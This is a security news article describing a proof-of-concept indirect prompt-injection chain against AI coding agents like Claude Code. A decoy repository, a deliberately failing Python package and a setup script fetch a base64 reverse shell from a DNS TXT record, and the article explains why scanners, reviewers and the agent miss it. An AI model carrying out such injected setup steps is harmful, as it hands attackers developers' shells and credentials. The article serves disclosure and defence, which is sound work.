Attack Chain Exploits AI Agent Trust Boundaries
Researchers at Mozilla’s Zero Day Investigative Network (0DIN) have demonstrated a proof-of-concept attack that compromises developer workstations through AI-powered coding agents like Claude Code. The attack uses indirect prompt injection, a technique classified as LLM01:2025 by OWASP, which embeds malicious instructions in external content processed by the AI rather than in direct user input. This enables a reverse shell under the developer’s own user privileges, exposing environment secrets including API keys and cloud credentials.
The attack chains three seemingly innocuous components. A GitHub repository presents a legitimate-looking setup flow for a fictional tool called “Axiom.” A Python package is engineered to fail on first use with a routine error message. The setup script then fetches its actual payload from a DNS TXT record controlled by the attacker, executing a base64-encoded reverse shell that remains invisible to static code scanners, human reviewers, and the AI agent itself. The developer sees only normal terminal output while the attacker gains full interactive shell access.
Defensive Gaps and Broader Implications
The attack surface extends beyond Claude Code to other agentic coding tools including Cursor and Gemini CLI. The exploit exploits a fundamental architectural gap: its components span three separate systems that are never examined together. Static analysis sees a DNS lookup in a shell script with no malicious content. Human review sees normal setup instructions. Network monitoring sees routine DNS resolution. The AI agent itself sees a pre-authorized setup step and never evaluates the DNS record contents.
This technique mirrors CVE-2025-55284, a high-severity Claude Code vulnerability patched in June 2025 involving exfiltration via DNS subdomain encoding. Unit 42 documented the first large-scale indirect prompt injection attacks in the wild in March 2026. Agentic coding tools have authorized access to private environment variables, credentials, and API keys while consuming untrusted content from repositories and error messages. Until vendors implement transparent runtime execution chains and developers adopt sandbox-first workflows for unfamiliar code, this attack vector remains actively exploitable.
Source: Cyber Security News
